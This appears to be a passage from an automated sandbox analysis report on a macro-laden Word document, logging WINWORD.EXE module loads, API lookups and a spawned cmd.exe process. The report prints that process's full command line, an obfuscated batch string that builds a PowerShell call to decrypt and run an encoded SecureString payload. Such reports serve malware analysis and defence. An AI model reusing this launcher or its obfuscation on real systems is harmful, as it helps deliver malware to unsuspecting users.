QAMgA2ADQANgBiADEAOQBjAGEAYQAxADkAZAA4ADMANQAwADIAYwAzADEAZQA2AGEAOQAxADUAOAA4AGYAZgAxADMAMwBjADUANQAwADYAMwBmADkANQBmADcAOQBjADUAMABiADMANwAwAGEAMgAzADUAYQAzADMAYgA1ADQAMwBkADQAZABhADQAYwA5ADIAMgBiAGIAZQA1ADgAYgBlAGEANgAyADMANwA5ADgAZAA4ADQAMgBmADQAMQBmAGMAOAA0ADAAZgBmADYAMAA2AGIAMQA5AGYAMgBmAGUAYwAxADUAMwA5ADkAMgBjADEANQAyADEAOABlAGYAMQAxADQAYQBhADUAOABjADcANQA3AGQAZgAzADIAMABjAGEAMAA5AGUAMAAwADAAMAAzADkANgA2ADgAZgBjADAAOQA2AGIAMQAwAGYAMwBiAGUAYQAxADIAMAAxADMAZQAyADQAZAA0ADcANQAxAGUANwAyAGQAMwBlAGUAYgA2AGIAMwBiADIAMgA2ADEAYgAwADcAOAA2ADcAOQA3ADEAYwA1ADIAZgBhADYANAA4ADIAMgAwADIAZAA2AGQANQBhADEANwA4ADUANgAwADIANABhADgAMAA5AGUAMgA1AGMANwBjADgANwBjAGQAZQAwAGUANABkADcAYwA2ADUAYQBhADAAYwBhADgANQBkADgANgBjADMAYwA1ADUAYgA5ADYAZQBmADUAOABhAGEANgAwADcAOAA3ADUANQA0ADkANgAzAGYAZAA2ADAAMwAzADAAYwBkADQAOQBkAGMAZgAyAGMANQA2AGQAYgBhAGIAZQBmADkAYQBjAGMAMABiADgANgA1AGMAYQBhAGEAMQAzAGQAMAAzADUAZABjADkAZQBjADcAZAA2ADAANAAxAGYAMwA2ADQAOAA3ADAAZAAwADUANwA3ADYANABkADQAOABkADQAMwBlADIAYwBlADEANQA2ADMAZgBjADYAOQBlADIANwA1ADIAYgA4ADcAMwBiADgAMQA1ADcAYgBlADUANQA5ADgAMgBkADkANQBhADUAMQA5AGUAOQBlAGYAZgBmAGIAYQA2AGUANwA2AGUANAA0ADgAYgAzADMAZQBhADgAZQAzAGQANwAxADUAMwA4ADkAZQA5ADgANAA3ADUAYQA0ADcAOAAyAGIAMgBiADAAMQA4AGEAOQA0ADAAMQAwAGQAZQA2AGMANwA3ADkAOAA0AGIAZgAxADAANABhAGMAYwBkADcANgA4ADkAYgAxADYANgA0AGQAMgBjADIAYgA1ADkANQAzADIAZAAzADEANQA2ADQAZQBlADYAMQA1AGUAYgBhAGUANAA1ADEAYwAzAGQANwA0ADgAOAA5AGQAZQA2AGEANgBjADIAMABjADgAYQAwADUANQA5ADIAMgAxADAAMABkAGQANABmADAAOABhADAAMABmAGYANQA0ADgAYgA1AGMAZQBjAGIANABkADMAOQAyADAANgBjAGMANABiAGEAZQA3AGQANQBlAGYAOQA2AGUAMgBmADcAMwBmAGIANgBkADcAZAAwADQANwA0AGUANgAyAGQAYgA5AGMANgBlADQAOQBmADgAMwA2ADkANwA5ADAANgAxADIANwA4ADEANwA4AGEAMQBiADgAOAA3ADMANQBjAGUANQA4ADgAYwA1ADMAMgBkADgANAA1AGIAMwA5ADQAYQBmADAANQBiAGIAMwA5ADMAMQA5ADUANAA2AGUAZQA1ADgAOAAyADAANQAxADUAMgBiAGMAMwBkAGIAYwBiADkAOQA3AGUAMQA4ADgANwBmAGQAMAAwADAANAA1AGYAYwA0AGUAZAAwAGIAOQBjADQAOAAxADcANABiAGYAMABlADgAYgBmADIAZgBjAGMANQA2ADQANAAxADcANQAyADQAZgA4ADMANABlAGYAOABhADcAMAA3ADgANABlADQAYwA5AGIAYQAzADQANgA4AGUAOABlAGMAYQAxADYAOABjAGEAZgAxADcAZgA3AGMAZQBlADMANwAwAGEAYgAzADYAZgBkAGIANgA3ADcAOAAxAGEANQA5ADQAZgBjADAAMgBmADgANgAzADQANgAwAGMAYwAwAGMAZgBjADcAYwBlADYAYgBmADQAYgAzAGYANQBlAGQAMgBmAGIAMgA5ADEAOQBjAGMAYgBiADMAMwBjAGIAYwBhAGMAYQBlADkAOQA0ADcAOAA0ADUAOABhADMAYgBlADMANwBkADcAZQAwADAAMwBhADcAYgBlAGIAYQAxAGYAZQBhADEAMABhADkAOAA0ADgAMwA1AGMAMwA0ADkAZAA4ADkAZQA4ADkAYgA4ADAANAA2ADMAYgAyADAANgA2AGUAZAA0ADUAYwA5ADIANAA1ADcAMgA3ADEANwAyAGQAYQAyADEAZQA3AGMANABkADUAYgAzADAAYwA0ADkAOQBlAGYAZQBkAGYAMABlAGEAZABmADIANwBlADkAOQA1AGQAMwBmAGQAYgBjADEAMwA3ADMAMwBlAGMAOQBiADEAMwA3AGUAZgBjADUAOABlADMAYwA3ADEAOAAwADUAYwA1ADAAZQA2AGEAYgA0AGQAMgA0ADQANgBmADMAZQBhAGMANwA5AGYAMQBlAGYANwBmADIAYgAyADkAOABhADgAZABiADMAZABkADYAOQBiADUAOAAwADMANgA5AGUAOABkAGUANgBlAGUAMgBlADgAMwA4ADkAOAAyADAAMQBlAGIAZABiADUAMwBlADQAZQBhADcAYQBlAGEAMwBhADQAOABlADAAYwA2AGQAZABhADgAZgAwADYANQBjADMAMwAwAGQANQA2ADkANQBiAGQANQA4ADMAZgBhAGMAMwA2AGMAZgA4ADUAMQA2ADUAMABmAGUAMQA5AGUAMQAxADQANABhADQAZAA5ADUANABkAGIANwA3ADAAMABiADEAOQA4ADYAOQAxADMAYgAxAGYAMgA4ADYAZgBiADUAZgBjADYAOQBlADMAZQBjAGQANwBkAGIANAA3ADMAZAA0ADMAZQBlAGYAYwA1AGYAZgA5AGUANAA2ADUAOAA1ADYANwAzAGEAZQAzADUAMABhADgAMgA0ADEAMwAzAGYAYwAwADAANgA0AGIAZQAwAGQANQBkAGYAYQAxADIAZQBlAGYAOAA1ADgAZgA5ADgAMwA2ADIAOQAwAGMAMQAwADcAMAA0ADQAYgA4AGEAZgAwADkANgA2ADUANAA3AGMAMgBlADIAYgA3AGUAOQBlADgAZQBiAGIAMABhAGYANgAyAGEAMQA0AGEAYQBhADUAMAA4AGIANAA0ADMAYgBmA | - |
|
1 |
Module (171)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | Comctl32.dll | base_address = 0x7fefb970000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x7fee1df0000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL | base_address = 0x7fee2c00000 |
|
1 | |
| Load | OLEAUT32.DLL | base_address = 0x7fefe910000 |
|
1 | |
| Load | VBE7.DLL | base_address = 0x7fee2510000 |
|
18 | |
| Get Handle | c:\program files\microsoft office\root\office16\winword.exe | base_address = 0x13f130000 |
|
1 | |
| Get Handle | MSI.DLL | base_address = 0x7fef9b60000 |
|
1 | |
| Get Handle | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\system32\user32.dll | base_address = 0x76df0000 |
|
1 | |
| Get Handle | oleaut32.dll | base_address = 0x7fefe910000 |
|
1 | |
| Get Filename | - | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
3 | |
| Get Address | Unknown module name | function = MsiProvideQualifiedComponentA, address_out = 0x7fef9be3b3c |
|
1 | |
| Get Address | Unknown module name | function = MsiGetProductCodeA, address_out = 0x7fef9bda13c |
|
1 | |
| Get Address | Unknown module name | function = MsiReinstallFeatureA, address_out = 0x7fef9be1618 |
|
1 | |
| Get Address | Unknown module name | function = MsiProvideComponentA, address_out = 0x7fef9bdf088 |
|
1 | |
| Get Address | Unknown module name | function = MsoVBADigSigCallDlg, address_out = 0x7fee1ef72c0 |
|
1 | |
| Get Address | Unknown module name | function = MsoVbaInitSecurity, address_out = 0x7fee1e660b0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFIEPolicyAndVersion, address_out = 0x7fee1e11a60 |
|
1 | |
| Get Address | Unknown module name | function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee1e65f50 |
|
1 | |
| Get Address | Unknown module name | function = MsoFInitOffice, address_out = 0x7fee1e0f000 |
|
1 | |
| Get Address | Unknown module name | function = MsoUninitOffice, address_out = 0x7fee1dfe860 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetFontSettings, address_out = 0x7fee1df3fc0 |
|
1 | |
| Get Address | Unknown module name | function = MsoRgchToRgwch, address_out = 0x7fee1e02380 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface, address_out = 0x7fee1df7b80 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface2, address_out = 0x7fee1df7b20 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateControl, address_out = 0x7fee1df8730 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongLoad, address_out = 0x7fee1f33260 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongSave, address_out = 0x7fee1f33280 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetTooltips, address_out = 0x7fee1e01f40 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetTooltips, address_out = 0x7fee1e66370 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLoadToolbarSet, address_out = 0x7fee1e54590 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateToolbarSet, address_out = 0x7fee1df55b0 |
|
1 | |
| Get Address | Unknown module name | function = MsoHpalOffice, address_out = 0x7fee1e00240 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProcNeeded, address_out = 0x7fee1df3d10 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProc, address_out = 0x7fee1df6d30 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateITFCHwnd, address_out = 0x7fee1df3d40 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyITFC, address_out = 0x7fee1dfe6f0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee1dfdf40 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetComponentManager, address_out = 0x7fee1df7bf0 |
|
1 | |
| Get Address | Unknown module name | function = MsoMultiByteToWideChar, address_out = 0x7fee1dffcd0 |
|
1 | |
| Get Address | Unknown module name | function = MsoWideCharToMultiByte, address_out = 0x7fee1df8b20 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrRegisterAll, address_out = 0x7fee1ef2ef0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetComponentManager, address_out = 0x7fee1e042c0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateStdComponentManager, address_out = 0x7fee1df3e20 |
|
1 | |
| Get Address | Unknown module name | function = MsoFHandledMessageNeeded, address_out = 0x7fee1dfab10 |
|
1 | |
| Get Address | Unknown module name | function = MsoPeekMessage, address_out = 0x7fee1dfa7d0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateIPref, address_out = 0x7fee1df1550 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyIPref, address_out = 0x7fee1dfe830 |
|
1 | |
| Get Address | Unknown module name | function = MsoChsFromLid, address_out = 0x7fee1df13d0 |
|
1 | |
| Get Address | Unknown module name | function = MsoCpgFromChs, address_out = 0x7fee1df6660 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetLocale, address_out = 0x7fee1df1500 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee1df3dd0 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetVbaInterfaces, address_out = 0x7fee1ef71e0 |
|
1 | |
| Get Address | Unknown module name | function = MsoGetControlInstanceId, address_out = 0x7fee1ec6d10 |
|
1 | |
| Get Address | Unknown module name | function = VbeuiFIsEdpEnabled, address_out = 0x7fee1f398e0 |
|
1 | |
| Get Address | Unknown module name | function = VbeuiEnterpriseProtect, address_out = 0x7fee1f39830 |
|
1 | |
| Get Address | Unknown module name | function = SysFreeString, address_out = 0x7fefe911320 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLib, address_out = 0x7fefe91f1e0 |
|
1 | |
| Get Address | Unknown module name | function = RegisterTypeLib, address_out = 0x7fefe96caa0 |
|
1 | |
| Get Address | Unknown module name | function = QueryPathOfRegTypeLib, address_out = 0x7fefe9a1760 |
|
1 | |
| Get Address | Unknown module name | function = UnRegisterTypeLib, address_out = 0x7fefe9a20d0 |
|
2 | |
| Get Address | Unknown module name | function = OleTranslateColor, address_out = 0x7fefe93c760 |
|
1 | |
| Get Address | Unknown module name | function = OleCreateFontIndirect, address_out = 0x7fefe96ecd0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePictureIndirect, address_out = 0x7fefe96e840 |
|
1 | |
| Get Address | Unknown module name | function = OleLoadPicture, address_out = 0x7fefe97f420 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrameIndirect, address_out = 0x7fefe974ec0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrame, address_out = 0x7fefe979350 |
|
1 | |
| Get Address | Unknown module name | function = OleIconToCursor, address_out = 0x7fefe946e40 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLibEx, address_out = 0x7fefe91a550 |
|
2 | |
| Get Address | Unknown module name | function = OleLoadPictureEx, address_out = 0x7fefe97f320 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetSystemMetrics, address_out = 0x76e094f0 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromWindow, address_out = 0x76e05f08 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromRect, address_out = 0x76e02b00 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromPoint, address_out = 0x76dfab64 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayMonitors, address_out = 0x76e05c30 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetMonitorInfoA, address_out = 0x76dfa730 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayDevicesA, address_out = 0x76dfa5b4 |
|
1 | |
| Get Address | Unknown module name | function = DispCallFunc, address_out = 0x7fefe912270 |
|
1 | |
| Get Address | Unknown module name | function = CreateTypeLib2, address_out = 0x7fefe99dbd0 |
|
1 | |
| Get Address | Unknown module name | function = VarDateFromUdate, address_out = 0x7fefe915c90 |
|
1 | |
| Get Address | Unknown module name | function = VarUdateFromDate, address_out = 0x7fefe916330 |
|
1 | |
| Get Address | Unknown module name | function = GetAltMonthNames, address_out = 0x7fefe9366c0 |
|
1 | |
| Get Address | Unknown module name | function = VarNumFromParseNum, address_out = 0x7fefe914710 |
|
1 | |
| Get Address | Unknown module name | function = VarParseNumFromStr, address_out = 0x7fefe9148f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR4, address_out = 0x7fefe94b640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR8, address_out = 0x7fefe94b360 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromDate, address_out = 0x7fefe952640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromI4, address_out = 0x7fefe9358a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromCy, address_out = 0x7fefe935820 |
|
1 | |
| Get Address | Unknown module name | function = VarR4FromDec, address_out = 0x7fefe94af20 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromTypeInfo, address_out = 0x7fefe96a0c0 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromGuids, address_out = 0x7fefe9a2160 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetRecordInfo, address_out = 0x7fefe935af0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetRecordInfo, address_out = 0x7fefe935a90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetIID, address_out = 0x7fefe935a60 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetIID, address_out = 0x7fefe935a30 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCopyData, address_out = 0x7fefe9160b0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayAllocDescriptorEx, address_out = 0x7fefe913e90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCreateEx, address_out = 0x7fefe969f80 |
|
1 | |
| Get Address | Unknown module name | function = VarFormat, address_out = 0x7fefe999b20 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatDateTime, address_out = 0x7fefe999aa0 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatNumber, address_out = 0x7fefe999990 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatPercent, address_out = 0x7fefe999890 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatCurrency, address_out = 0x7fefe999770 |
|
1 | |
| Get Address | Unknown module name | function = VarWeekdayName, address_out = 0x7fefe97b8d0 |
|
1 | |
| Get Address | Unknown module name | function = VarMonthName, address_out = 0x7fefe97b800 |
|
1 | |
| Get Address | Unknown module name | function = VarAdd, address_out = 0x7fefe9948e0 |
|
1 | |
| Get Address | Unknown module name | function = VarAnd, address_out = 0x7fefe999470 |
|
1 | |
| Get Address | Unknown module name | function = VarCat, address_out = 0x7fefe9996a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDiv, address_out = 0x7fefe992fe0 |
|
1 | |
| Get Address | Unknown module name | function = VarEqv, address_out = 0x7fefe999cf0 |
|
1 | |
| Get Address | Unknown module name | function = VarIdiv, address_out = 0x7fefe998ff0 |
|
1 | |
| Get Address | Unknown module name | function = VarImp, address_out = 0x7fefe999c00 |
|
1 | |
| Get Address | Unknown module name | function = VarMod, address_out = 0x7fefe998e60 |
|
1 | |
| Get Address | Unknown module name | function = VarMul, address_out = 0x7fefe993690 |
|
1 | |
| Get Address | Unknown module name | function = VarOr, address_out = 0x7fefe9992d0 |
|
1 | |
| Get Address | Unknown module name | function = VarPow, address_out = 0x7fefe992e80 |
|
1 | |
| Get Address | Unknown module name | function = VarSub, address_out = 0x7fefe993f90 |
|
1 | |
| Get Address | Unknown module name | function = VarXor, address_out = 0x7fefe9991a0 |
|
1 | |
| Get Address | Unknown module name | function = VarAbs, address_out = 0x7fefe977c30 |
|
1 | |
| Get Address | Unknown module name | function = VarFix, address_out = 0x7fefe977a60 |
|
1 | |
| Get Address | Unknown module name | function = VarInt, address_out = 0x7fefe977890 |
|
1 | |
| Get Address | Unknown module name | function = VarNeg, address_out = 0x7fefe977ea0 |
|
1 | |
| Get Address | Unknown module name | function = VarNot, address_out = 0x7fefe999600 |
|
1 | |
| Get Address | Unknown module name | function = VarRound, address_out = 0x7fefe9776a0 |
|
1 | |
| Get Address | Unknown module name | function = VarCmp, address_out = 0x7fefe9983f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecAdd, address_out = 0x7fefe943070 |
|
1 | |
| Get Address | Unknown module name | function = VarDecCmp, address_out = 0x7fefe94d700 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCat, address_out = 0x7fefe94d890 |
|
1 | |
| Get Address | Unknown module name | function = VarCyMulI4, address_out = 0x7fefe92caf0 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCmp, address_out = 0x7fefe938a00 |
|
1 | |
| Get Address | Unknown module name | address_out = 0x7fee1dffcd0 |
|
1 | |
| Get Address | Unknown module name | function = 582, address_out = 0x7fee28232b4 |
|
3 | |
| Get Address | Unknown module name | function = 583, address_out = 0x7fee2822400 |
|
3 | |
| Get Address | Unknown module name | function = 712, address_out = 0x7fee2899db0 |
|
3 | |
| Get Address | Unknown module name | function = 632, address_out = 0x7fee267d6f0 |
|
3 | |
| Get Address | Unknown module name | function = 608, address_out = 0x7fee267ae28 |
|
3 | |
| Get Address | Unknown module name | function = 716, address_out = 0x7fee28524c8 |
|
3 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = ThunderMain, wndproc_parameter = 0 |
|
1 |
System (20)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 361, y_out = 884 |
|
3 | |
| Get Time | type = System Time, time = 2018-04-05 07:21:12 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 141508 |
|
1 | |
| Get Time | type = Local Time, time = 2018-04-05 07:21:18 (Local Time) |
|
9 | |
| Get Time | type = Local Time, time = 2018-04-05 07:21:19 (Local Time) |
|
2 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Operating System |
|
2 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = DDRYBUR |
|
1 |
Process #2: cmd.exe
109
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" tQZwbXH KCoJvcWVmThmQFEmEKTc lBUvzuulqjniw & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %mSjUIVjKCvrosnG%=YaAhiJLINtE&&set %iibdZAhWS%=p&&set %UKkjOWmc%=o^w&&set %CKJHjErkGaOznLZ%=UbmSUqbPikMOd&&set %orvBFUr%=!%iibdZAhWS%!&&set %GaGORjztoIjBCAG%=bMVIRrhb&&set %miGHuQvztiW%=e^r&&set %PRCHEZFPHY%=!%UKkjOWmc%!&&set %PqsKzFkV%=s&&set %bjMitdwscHzzIkV%=ZzjSCRRpVGC&&set %McrAWpDQaNJ%=he&&set %jwjXbhMi%=ll&&!%orvBFUr%!!%PRCHEZFPHY%!!%miGHuQvztiW%!!%PqsKzFkV%!!%McrAWpDQaNJ%!!%jwjXbhMi%! " ( [rUnTImE.INteRoPsERvICEs.MARshAl]::PTrTOsTrIngbSTR([RUNtIMe.INtEROpserVIcEs.MarshAL]::securEStRinGtObsTR( $('76492d1116743f0423413b16050a5345MgB8AHgAdgBHAHQANgB4AHIANwAyAFUANgBzAEsAbgB2AC8ANAA2ADQAaQByAHcAPQA9AHwANQBiADIAZABjAGYAZQBkAGMAMAA3AGMAYgA5ADAANgBkAGYAMwBjAGQANQBkADEANAA0ADgAOAA1ADkAYwBjADcAYQAzADcAYwBmAGQAZQBjADcANAAwAGIAZgAwAGYANwBlADkANgA2ADIAZgAxADcAMABiADYAYgBkADcAZQA2AGMAZQA5ADYAZgBhAGYAZgBiAGYAOQBjADEAYQBhADIAYgA5ADUAYQA1ADUAMwBmADkAYwAwAGYANwA5AGMANgA0ADEANwA2AGEAYgA0ADQAYgBmAGIANgBmADgAMAAzADYAOQA3AGIAYgBiADAANgA2AGEANQA4ADYAYQA0ADEAMABlAGUANgA4ADAAYgAyAGEAMgA5AGUAOQBkADQAOAA1ADQAYQAyADAAYQA4AGUANQA0AGYAMQAyAGQAYwBhADAANABmADMANABlAGMAZgA1AGUAMgAzADEANwBjADQAMgBkAGEAMQBmAGUAMwBiADYAYgBlADQAMgAzADMAMwAyAGIANgA4AGUAYgA1ADQAMQBlADQANwAyADUAZQBjADEAOQBlAGMANABiAGEAYwBiADAAMABjAGQAYwA1AGQAYQA4ADAANQBhADUANAAyAGUANAAzADUAOABmADcAMgAwADYAYQA2AGYAYwA4ADUAMgA5ADkAMwA5ADcAYwA5ADYAMQBiADgAYgA0ADIAMgBiADUANgAzAGQAYgA5AGUAMgA0ADAANABhADEANQA4AGMAZQBhAGUAMAA3AGEANwAzADUAZQBjADMAMwBiAGUANABlADYAMAA1ADkAMABmAGMAMQAzADcAMQAwADIAOQAxADYAMAA4ADYAMwAyADUAMAA3AGQAYgBiADQAMQBhAGIAYgBkAGYAZgA0AGMANwA0ADMAYwA4ADkAYQBkAGYAOAA5ADQAYQBhAGMAZgAyADUANwBhADEANAA1AGQAZQA0ADAAYQA3ADUANQAxADIAOQAzAGIAZgA0AGMAMwAyADQAMgA2ADQANgBiADEAOQBjAGEAYQAxADkAZAA4ADMANQAwADIAYwAzADEAZQA2AGEAOQAxADUAOAA4AGYAZgAxADMAMwBjADUANQAwADYAMwBmADkANQBmADcAOQBjADUAMABiADMANwAwAGEAMgAzADUAYQAzADMAYgA1ADQAMwBkADQAZABhADQAYwA5ADIAMgBiAGIAZQA1ADgAYgBlAGEANgAyADMANwA5ADgAZAA4ADQAMgBmADQAMQBmAGMAOAA0ADAAZgBmADYAMAA2AGIAMQA5AGYAMgBmAGUAYwAxADUAMwA5ADkAMgBjADEANQAyADEAOABlAGYAMQAxADQAYQBhADUAOABjADcANQA3AGQAZgAzADIAMABjAGEAMAA5AGUAMAAwADAAMAAzADkANgA2ADgAZgBjADAAOQA2AGIAMQAwAGYAMwBiAGUAYQAxADIAMAAxADMAZQAyADQAZAA0ADcANQAxAGUANwAyAGQAMwBlAGUAYgA2AGIAMwBiADIAMgA2ADEAYgAwADcAOAA2ADcAOQA3ADEAYwA1ADIAZgBhADYANAA4ADIAMgAwADIAZAA2AGQANQBhADEANwA4ADUANgAwADIANABhADgAMAA5AGUAMgA1AGMANwBjADgANwBjAGQAZQAwAGUANABkADcAYwA2ADUAYQBhADAAYwBhADgANQBkADgANgBjADMAYwA1ADUAYgA5ADYAZQBmADUAOABhAGEANgAwADcAOAA3ADUANQA0ADkANgAzAGYAZAA2ADAAMwAzADAAYwBkADQAOQBkAGMAZgAyAGMANQA2AGQAYgBhAGIAZQBmADkAYQBjAGMAMABiADgANgA1AGMAYQBhAGEAMQAzAGQAMAAzADUAZABjADkAZQBjADcAZAA2ADAANAAxAGYAMwA2ADQAOAA3ADAAZAAwADUANwA3ADYANABkADQAOABkADQAMwBlADIAYwBlADEANQA2ADMAZgBjADYAOQBlADIANwA1ADIAYgA4ADcAMwBiADgAMQA1ADcAYgBlADUANQA5ADgAMgBkADkANQBhADUAMQA5AGUAOQBlAGYAZgBmAGIAYQA2AGUANwA2AGUANAA0ADgAYgAzADMAZQBhADgAZQAzAGQANwAxADUAMwA4ADkAZQA5ADgANAA3ADUAYQA0ADcAOAAyAGIAMgBiADAAMQA4AGEAOQA0ADAAMQAwAGQAZQA2AGMANwA3ADkAOAA0AGIAZgAxADAANABhAGMAYwBkADcANgA4ADkAYgAxADYANgA0AGQAMgBjADIAYgA1ADkANQAzADIAZAAzADEANQA2ADQAZQBlADYAMQA1AGUAYgBhAGUANAA1ADEAYwAzAGQANwA0ADgAOAA5AGQAZQA2AGEANgBjADIAMABjADgAYQAwADUANQA5ADIAMgAxADAAMABkAGQANABmADAAOABhADAAMABmAGYANQA0ADgAYgA1AGMAZQBjAGIANABkADMAOQAyADAANgBjAGMANABiAGEAZQA3AGQANQBlAGYAOQA2AGUAMgBmADcAMwBmAGIANgBkADcAZAAwADQANwA0AGUANgAyAGQAYgA5AGMANgBlADQAOQBmADgAMwA2ADkANwA5ADAANgAxADIANwA4ADEANwA4AGEAMQBiADgAOAA3ADMANQBjAGUANQA4ADgAYwA1ADMAMgBkADgANAA1AGIAMwA5ADQAYQBmADAANQBiAGIAMwA5ADMAMQA5ADUANAA2AGUAZQA1ADgAOAAyADAANQAxADUAMgBiAGMAMwBkAGIAYwBiADkAOQA3AGUAMQA4ADgANwBmAGQAMAAwADAANAA1AGYAYwA0AGUAZAAwAGIAOQBjADQAOAAxADcANABiAGYAMABlADgAYgBmADIAZgBjAGMANQA2ADQANAAxADcANQAyADQAZgA4ADMANABlAGYAOABhADcAMAA3ADgANABlADQAYwA5AGIAYQAzADQANgA4AGUAOABlAGMAYQAxADYAOABjAGEAZgAxADcAZgA3AGMAZQBlADMANwAwAGEAYgAzADYAZgBkAGIANgA3ADcAOAAxAGEANQA5ADQAZgBjADAAMgBmADgANgAzADQANgAwAGMAYwAwAGMAZgBjADcAYwBlADYAYgBmADQAYgAzAGYANQBlAGQAMgBmAGIAMgA5ADEAOQBjAGMAYgBiADMAMwBjAGIAYwBhAGMAYQBlADkAOQA0ADcAOAA0ADUAOABhADMAYgBlADMANwBkADcAZQAwADAAMwBhADcAYgBlAGIAYQAxAGYAZQBhADEAMABhADkAOAA0ADgAMwA1AGMAMwA0ADkAZAA4ADkAZQA4ADkAYgA4ADAANAA2ADMAYgAyADAANgA2AGUAZAA0ADUAYwA5ADIANAA1ADcAMgA3ADEANwAyAGQAYQAyADEAZQA3AGMANABkADUAYgAzADAAYwA0ADkAOQBlAGYAZQBkAGYAMABlAGEAZABmADIANwBlADkAOQA1AGQAMwBmAGQAYgBjADEAMwA3ADMAMwBlAGMAOQBiADEAMwA3AGUAZgBjADUAOABlADMAYwA3ADEAOAAwADUAYwA1ADAAZQA2AGEAYgA0AGQAMgA0ADQANgBmADMAZQBhAGMANwA5AGYAMQBlAGYANwBmADIAYgAyADkAOABhADgAZABiADMAZABkADYAOQBiADUAOAAwADMANgA5AGUAOABkAGUANgBlAGUAMgBlADgAMwA4ADkAOAAyADAAMQBlAGIAZABiADUAMwBlADQAZQBhADcAYQBlAGEAMwBhADQAOABlADAAYwA2AGQAZABhADgAZgAwADYANQBjADMAMwAwAGQANQA2ADkANQBiAGQANQA4ADMAZgBhAGMAMwA2AGMAZgA4ADUAMQA2ADUAMABmAGUAMQA5AGUAMQAxADQANABhADQAZAA5ADUANABkAGIANwA3ADAAMABiADEAOQA4ADYAOQAxADMAYgAxAGYAMgA4ADYAZgBiADUAZgBjADYAOQBlADMAZQBjAGQANwBkAGIANAA3ADMAZAA0ADMAZQBlAGYAYwA1AGYAZgA5AGUANAA2ADUAOAA1ADYANwAzAGEAZQAzADUAMABhADgAMgA0ADEAMwAzAGYAYwAwADAANgA0AGIAZQAwAGQANQBkAGYAYQAxADIAZQBlAGYAOAA1ADgAZgA5ADgAMwA2ADIAOQAwAGMAMQAwADcAMAA0ADQ